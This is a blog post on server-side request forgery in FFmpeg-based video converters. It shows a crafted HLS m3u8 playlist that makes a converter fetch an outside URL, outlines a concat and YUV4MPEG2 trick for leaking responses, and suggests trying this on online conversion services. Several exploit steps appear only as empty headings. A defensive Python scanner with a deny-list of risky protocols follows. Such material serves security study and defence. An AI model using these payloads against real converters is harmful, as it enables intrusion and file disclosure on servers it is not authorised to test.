Exploiting SSRF in video converters – All things in moderation

Exploiting SSRF in video converters

Background

  • dozens of video formats
  • hundreds of video/audio codecs
  • different bitrates, resolutions, etc.

FFmpeg

What is FFmpeg

According to Wikipedia, FFmpeg is a free software project that produces libraries and programs for handling multimedia data. In short, it is a video conversion tool.

How FFmpeg really works

Look closer at ffmpeg: extension

Play video out.mp4:

HTTP Live Streaming (HLS)

  • Live and on-demand streaming
  • Developed by Apple
  • Supported in FFmpeg
  • Docs: https://developer.apple.com/streaming/

m3u8

A file with the M3U8 file extension is a UTF-8 Encoded Audio Playlist file. These are plain text files that both audio and video players can use to describe where media files are located. For more, see https://www.lifewire.com/m3u8-file-2621956

Make an HTTP request


Result:

Read response

Convert the same way as above, with the content of the file header.m3u8 as follows:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://hydrasky.com/?.txt
#EXT-X-ENDLIST

Here we are:

Exploit

Concat

Concat: reads a binary stream of data from multiple sources and interprets them as if they came from the same source.

YUV4MPEG2

The file header.y4m is located on the server at localhost/header.y4m

video.mp4

Yes, it works!

Conclusion

  • Solution: FFmpeg protocol whitelist patch
  • In the latest versions (> 3.2.2), this vulnerability is fixed
  • There are 3 attack vectors you can exploit: thumbnail, DNS, or mp4.
  • The simple scenario is uploading a video file to a server that offers online video conversion; if it uses FFmpeg, try to exploit it
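
The protocol whitelist idea above, seen from the converter operator's side, as an added example that is not code from the original post or from the FFmpeg project. It inspects an upload by content for HLS playlist entries that would make the converter fetch a URL or chain sources, and builds a conversion command using FFmpeg's `-protocol_whitelist` option. The function names, the deny-list and the `media.example` hosts are assumptions made for illustration.

```python
import re

# Constructed deny-list for illustration: FFmpeg protocols that make the
# converter fetch a URL, read a local path, or chain other sources.
RISKY_SCHEMES = {"http", "https", "ftp", "tcp", "udp", "rtmp", "file", "concat"}
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

def risky_references(data: bytes, probe_bytes: int = 4096):
    """Return [(line_no, scheme, uri)] for an upload that is really an HLS playlist.
    Content is checked, not the file name: video.mp4 can still hold a playlist."""
    if b"#EXTM3U" not in data[:probe_bytes]:
        return []  # not a playlist: nothing for this check to report
    findings = []
    text = data.decode("utf-8", errors="replace")
    for line_no, line in enumerate(text.splitlines(), start=1):
        uri = line.strip()
        if not uri or uri.startswith("#"):
            continue  # tags and comments are not media entries
        pending = [uri]
        while pending:
            current = pending.pop(0)
            match = SCHEME_RE.match(current)
            scheme = match.group(1).lower() if match else ""
            if not scheme and current.startswith("/"):
                scheme = "file"  # absolute local path is opened via file:
            if scheme in RISKY_SCHEMES:
                findings.append((line_no, scheme, current))
            if scheme == "concat":
                # concat:a|b|c names several sources; inspect each of them too
                pending.extend(current[len("concat:"):].split("|"))
    return findings

def ffmpeg_args(src: str, dst: str):
    """Build a conversion command that only allows the local 'file' protocol."""
    return ["ffmpeg", "-nostdin", "-protocol_whitelist", "file", "-i", src, dst]

# Constructed samples: the playlist shown on this page, and a concat entry
# pointing at placeholder hosts.
PAGE_PLAYLIST = (b"#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\n"
                 b"http://hydrasky.com/?.txt\n#EXT-X-ENDLIST\n")
CONCAT_PLAYLIST = (b"#EXTM3U\n#EXTINF:10.0,\n"
                   b"concat:http://media.example/a.ts|http://media.example/b.ts\n")

if __name__ == "__main__":
    for name, sample in (("page", PAGE_PLAYLIST), ("concat", CONCAT_PLAYLIST)):
        print(name, risky_references(sample))
```

An upload with any finding can be rejected before it reaches the converter; the whitelist on the command line remains the backstop for files the scan does not recognise.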

References

https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf
